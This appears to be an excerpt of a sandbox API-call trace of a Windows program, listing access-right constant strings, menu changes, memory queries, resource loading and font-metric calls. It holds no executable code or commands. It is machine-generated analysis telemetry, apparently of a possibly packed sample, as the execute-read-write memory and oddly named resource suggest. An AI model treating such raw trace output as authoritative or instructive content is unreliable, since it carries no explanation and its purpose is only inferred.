[0160.542] SysReAllocStringLen (in: pbstr=0x29de380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de380*="READ_CONTROL") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de370*="WRITE_OWNER") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de360*="WRITE_DAC") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x29de350*="PERM_FILE_CREATE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x29de340*="PERM_FILE_WRITE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x29de330*="PERM_FILE_READ") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de310*="STANDARD_RIGHTS_WRITE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de300*="STANDARD_RIGHTS_READ") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de2f0*="STANDARD_RIGHTS_ALL") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de2e0*="DELETE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de2d0*="READ_CONTROL") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de2c0*="WRITE_OWNER") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de2b0*="WRITE_DAC") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x29de2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x29de290*="PRINTER_ACCESS_USE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x29de280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x29de270*="SERVER_ACCESS_ENUMERATE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x29de260*="SERVER_ACCESS_ADMINISTER") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x29de250*="PRINTER_ALL_ACCESS") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x29de240*="PRINTER_EXECUTE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x29de230*="PRINTER_WRITE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x29de220*="PRINTER_READ") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x29de210*="PRINTER_ALL_ACCESS") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de200*="DELETE") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de1f0*="READ_CONTROL") returned 1
[0160.542] SysReAllocStringLen (in: pbstr=0x29de1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de1e0*="WRITE_OWNER") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de1d0*="WRITE_DAC") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x29de1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x29de1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x29de1a0*="SC_MANAGER_LOCK") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x29de190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x29de180*="SC_MANAGER_CONNECT") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x29de170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x29de160*="SC_MANAGER_ALL_ACCESS") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de140*="STANDARD_RIGHTS_WRITE") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de130*="STANDARD_RIGHTS_READ") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de120*="STANDARD_RIGHTS_ALL") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29de110*="DELETE") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29de100*="READ_CONTROL") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29de0f0*="WRITE_OWNER") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29de0e0*="WRITE_DAC") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x29de0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x29de0c0*="SERVICE_STOP") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x29de0b0*="SERVICE_START") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x29de0a0*="SERVICE_QUERY_STATUS") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x29de090*="SERVICE_QUERY_CONFIG") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x29de080*="SERVICE_PAUSE_CONTINUE") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x29de070*="SERVICE_INTERROGATE") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x29de060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x29de050*="SERVICE_CHANGE_CONFIG") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x29de040*="SERVICE_ALL_ACCESS") returned 1
[0160.543] SysReAllocStringLen (in: pbstr=0x29de030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29de030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29de020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29de020*="STANDARD_RIGHTS_WRITE") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29de010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29de010*="STANDARD_RIGHTS_READ") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29de000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29de000*="STANDARD_RIGHTS_ALL") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ddff0*="DELETE") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ddfe0*="READ_CONTROL") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ddfd0*="WRITE_OWNER") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ddfc0*="WRITE_DAC") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x29ddfb0*="KEY_SET_VALUE") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x29ddfa0*="KEY_CREATE_LINK") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x29ddf90*="KEY_CREATE_SUB_KEY") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x29ddf80*="KEY_NOTIFY") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x29ddf70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x29ddf60*="KEY_QUERY_VALUE") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ddf50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ddf40*="STANDARD_RIGHTS_WRITE") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x29ddf30*="STANDARD_RIGHTS_READ 2") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x29ddf20*="STANDARD_RIGHTS_ALL 1") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29ddf10*="DELETE") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddf00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ddf00*="READ_CONTROL") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddef0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ddef0*="WRITE_OWNER") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ddee0*="WRITE_DAC") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29dded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x29dded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x29ddec0*="DESKTOP_WRITEOBJECTS") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddeb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x29ddeb0*="DESKTOP_JOURNALRECORD") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29ddea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x29ddea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29dde90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x29dde90*="DESKTOP_HOOKCONTROL") returned 1
[0160.544] SysReAllocStringLen (in: pbstr=0x29dde80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x29dde80*="DESKTOP_CREATEWINDOW") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dde70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x29dde70*="DESKTOP_CREATEMENU") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dde60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x29dde60*="DESKTOP_READOBJECTS") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dde50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x29dde50*="DESKTOP_ENUMERATE") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dde40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29dde40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dde30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29dde30*="STANDARD_RIGHTS_WRITE") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dde20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29dde20*="STANDARD_RIGHTS_READ") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dde10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29dde10*="STANDARD_RIGHTS_ALL") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dde00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29dde00*="DELETE") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29dddf0*="READ_CONTROL") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29ddde0*="WRITE_OWNER") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29dddd0*="WRITE_DAC") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x29dddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29dddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x29dddb0*="WINSTA_READSCREEN") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x29ddda0*="WINSTA_READATTRIBUTES") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x29ddd90*="WINSTA_EXITWINDOWS") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x29ddd80*="WINSTA_ENUMERATE") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x29ddd70*="WINSTA_ENUMDESKTOPS") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x29ddd60*="WINSTA_CREATEDESKTOP") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x29ddd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x29ddd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29ddd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29ddd20*="STANDARD_RIGHTS_WRITE") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29ddd10*="STANDARD_RIGHTS_READ") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x29ddd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29ddcf0*="READ_CONTROL") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x29ddce0*="SI_ACCESS_SPECIFIC") returned 1
[0160.545] SysReAllocStringLen (in: pbstr=0x29ddcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29ddcd0*="WRITE_DAC") returned 1
[0160.546] SysReAllocStringLen (in: pbstr=0x29ddcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x29ddcc0*="FILE_DELETE") returned 1
[0160.546] SysReAllocStringLen (in: pbstr=0x29ddcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x29ddcb0*="FILE_DELETE_CHILD") returned 1
[0160.547] SetClassLongA (hWnd=0xd01e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0160.547] GetSystemMenu (hWnd=0xd01e8, bRevert=0) returned 0xd019d
[0160.548] DeleteMenu (hMenu=0xd019d, uPosition=0xf030, uFlags=0x0) returned 1
[0160.548] DeleteMenu (hMenu=0xd019d, uPosition=0xf000, uFlags=0x0) returned 1
[0160.548] DeleteMenu (hMenu=0xd019d, uPosition=0xf010, uFlags=0x0) returned 1
[0160.548] GetCurrentThreadId () returned 0x6f8
[0160.548] ResetEvent (hEvent=0xa0) returned 1
[0160.548] GetCurrentThreadId () returned 0x6f8
[0160.548] GetCurrentThreadId () returned 0x6f8
[0160.548] GetCurrentThreadId () returned 0x6f8
[0160.548] ResetEvent (hEvent=0xa0) returned 1
[0160.548] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f44c, fWinIni=0x0 | out: pvParam=0x14f44c) returned 1
[0160.548] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f44c, fWinIni=0x0 | out: pvParam=0x14f44c) returned 1
[0160.548] GetSystemMetrics (nIndex=49) returned 16
[0160.548] GetSystemMetrics (nIndex=50) returned 16
[0160.549] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f494, fWinIni=0x0 | out: pvParam=0x14f494) returned 1
[0160.549] IsWindowVisible (hWnd=0xd01e8) returned 0
[0160.549] GetCurrentThreadId () returned 0x6f8
[0160.549] VirtualQuery (in: lpAddress=0x29b1668, lpBuffer=0x14f364, dwLength=0x1c | out: lpBuffer=0x14f364*(BaseAddress=0x29b1000, AllocationBase=0x28f0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0160.549] FindResourceA (hModule=0x28f0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x29f8990
[0160.549] FindResourceA (hModule=0x28f0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x29f8990
[0160.549] LoadResource (hModule=0x28f0000, hResInfo=0x29f8990) returned 0x29ff044
[0160.549] SizeofResource (hModule=0x28f0000, hResInfo=0x29f8990) returned 0xca5
[0160.549] LockResource (hResData=0x29ff044) returned 0x29ff044
[0160.550] GetCurrentThreadId () returned 0x6f8
[0160.550] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f118, fWinIni=0x0 | out: pvParam=0x14f118) returned 1
[0160.550] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f118, fWinIni=0x0 | out: pvParam=0x14f118) returned 1
[0160.550] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f118, fWinIni=0x0 | out: pvParam=0x14f118) returned 1
[0160.550] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f118, fWinIni=0x0 | out: pvParam=0x14f118) returned 1
[0160.551] GetDC (hWnd=0x0) returned 0x480107e1
[0160.551] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f0fc | out: lptm=0x14f0fc) returned 1
[0160.551] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0160.553] CreateFontIndirectA (lplf=0x14f0b4) returned 0x480a083b
[0160.553] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.553] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f134 | out: lptm=0x14f134) returned 1
[0160.553] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.553] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.553] GetSystemMetrics (nIndex=6) returned 1
[0160.553] VirtualAlloc (lpAddress=0x2a14000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a14000
[0160.554] GetDC (hWnd=0x0) returned 0x480107e1
[0160.554] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f0fc | out: lptm=0x14f0fc) returned 1
[0160.554] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.554] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f134 | out: lptm=0x14f134) returned 1
[0160.554] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.554] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.554] GetSystemMetrics (nIndex=6) returned 1
[0160.555] GetDC (hWnd=0x0) returned 0x480107e1
[0160.555] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f0fc | out: lptm=0x14f0fc) returned 1
[0160.555] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.555] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f134 | out: lptm=0x14f134) returned 1
[0160.555] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.555] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.555] GetSystemMetrics (nIndex=6) returned 1
[0160.555] GetDC (hWnd=0x0) returned 0x480107e1
[0160.555] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f0fc | out: lptm=0x14f0fc) returned 1
[0160.555] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.555] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f134 | out: lptm=0x14f134) returned 1
[0160.555] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.555] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.555] GetSystemMetrics (nIndex=6) returned 1
[0160.556] GetDC (hWnd=0x0) returned 0x480107e1
[0160.556] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f110 | out: lptm=0x14f110) returned 1
[0160.556] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.556] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f148 | out: lptm=0x14f148) returned 1
[0160.556] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.556] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.556] GetSystemMetrics (nIndex=6) returned 1
[0160.556] GetDC (hWnd=0x0) returned 0x480107e1
[0160.556] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee14 | out: lptm=0x14ee14) returned 1
[0160.556] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.556] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee4c | out: lptm=0x14ee4c) returned 1
[0160.556] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.556] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.556] GetSystemMetrics (nIndex=6) returned 1
[0160.557] GetDC (hWnd=0x0) returned 0x480107e1
[0160.557] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f110 | out: lptm=0x14f110) returned 1
[0160.557] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.557] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f148 | out: lptm=0x14f148) returned 1
[0160.557] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.557] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.557] GetSystemMetrics (nIndex=6) returned 1
[0160.557] GetDC (hWnd=0x0) returned 0x480107e1
[0160.557] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee14 | out: lptm=0x14ee14) returned 1
[0160.557] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.557] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee4c | out: lptm=0x14ee4c) returned 1
[0160.557] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.557] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.557] GetSystemMetrics (nIndex=6) returned 1
[0160.558] GetDC (hWnd=0x0) returned 0x480107e1
[0160.558] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f110 | out: lptm=0x14f110) returned 1
[0160.558] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
[0160.558] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14f148 | out: lptm=0x14f148) returned 1
[0160.558] SelectObject (hdc=0x480107e1, h=0x18a002e) returned 0x480a083b
[0160.558] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.558] GetSystemMetrics (nIndex=6) returned 1
[0160.558] GetDC (hWnd=0x0) returned 0x480107e1
[0160.558] GetTextMetricsA (in: hdc=0x480107e1, lptm=0x14ee14 | out: lptm=0x14ee14) returned 1
[0160.558] SelectObject (hdc=0x480107e1, h=0x480a083b) returned 0x18a002e
